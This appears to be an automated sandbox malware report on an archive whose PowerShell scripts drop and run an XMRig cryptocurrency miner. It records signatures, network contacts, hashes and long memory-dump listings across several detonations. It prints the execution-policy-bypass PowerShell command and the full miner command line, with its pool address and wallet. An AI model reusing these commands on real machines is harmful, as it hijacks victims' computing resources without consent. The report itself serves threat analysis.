Malware Analysis Report

2025-04-19 18:43

Sample ID 240527-arwvlsae57
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:00

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1036,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=3948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3956,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=1644 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 41.173.79.40.in-addr.arpa udp

Files

memory/3760-0-0x00007FFE9C4D3000-0x00007FFE9C4D5000-memory.dmp

memory/3760-1-0x000001A883A60000-0x000001A883A82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qszyeyfu.tbd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3760-11-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/3760-12-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/3760-14-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/3760-15-0x000001A89E290000-0x000001A89E2A2000-memory.dmp

memory/3760-16-0x000001A89E270000-0x000001A89E27A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2028-47-0x0000029442720000-0x0000029442740000-memory.dmp

memory/2028-48-0x0000029443F20000-0x0000029443F40000-memory.dmp

memory/2028-49-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/3760-50-0x00007FFE9C4D3000-0x00007FFE9C4D5000-memory.dmp

memory/3760-51-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/2028-52-0x0000029443F40000-0x0000029443F60000-memory.dmp

memory/2028-53-0x0000029443F60000-0x0000029443F80000-memory.dmp

memory/2028-54-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/3760-55-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/2028-56-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-57-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-59-0x0000029443F60000-0x0000029443F80000-memory.dmp

memory/2028-58-0x0000029443F40000-0x0000029443F60000-memory.dmp

memory/2028-60-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-61-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-62-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-63-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-64-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-65-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-66-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-67-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-68-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-69-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-70-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-71-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-72-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-73-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-74-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-75-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-76-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-77-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-78-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-79-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-80-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-81-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-82-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-83-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-84-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-85-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-86-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-87-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-88-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-89-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-90-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-91-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-92-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-93-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-94-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-95-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-96-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-97-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-98-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-99-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-100-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-101-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-102-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-103-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-104-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-105-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-106-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-107-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-108-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-109-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-110-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-111-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-112-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-113-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-114-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-115-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-116-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-117-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-118-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win7-20231129-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

memory/1044-4-0x000007FEF5E5E000-0x000007FEF5E5F000-memory.dmp

memory/1044-5-0x000000001B640000-0x000000001B922000-memory.dmp

memory/1044-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

memory/1044-7-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-8-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-9-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-10-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-11-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:41

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

memory/1468-2-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-5-0x000001CB3B810000-0x000001CB3B832000-memory.dmp

memory/1468-8-0x000001CB53EA0000-0x000001CB53F16000-memory.dmp

memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tbtdi1b.sqe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1468-9-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-48-0x000001CB54350000-0x000001CB54362000-memory.dmp

memory/1468-61-0x000001CB53E60000-0x000001CB53E6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4016-90-0x000002A397B40000-0x000002A397B60000-memory.dmp

memory/4016-91-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/1468-92-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/4016-93-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/1468-94-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-95-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4016-96-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-97-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-98-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-99-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-100-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-101-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-102-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-103-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-104-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-105-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-106-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-107-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-108-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-109-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-110-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-111-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-112-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-113-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-114-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-115-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-116-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-117-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-118-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-119-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-120-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-121-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-122-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-123-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-124-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-125-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-126-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-127-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-128-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-129-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-130-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-131-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-132-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-133-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-134-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-135-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-136-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-137-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-138-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-139-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-140-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-141-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-142-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-143-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-144-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-145-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-146-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-147-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-148-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-149-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-150-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-151-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-152-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-153-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-154-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-155-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/4016-156-0x00007FF789940000-0x00007FF78A573000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:54

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
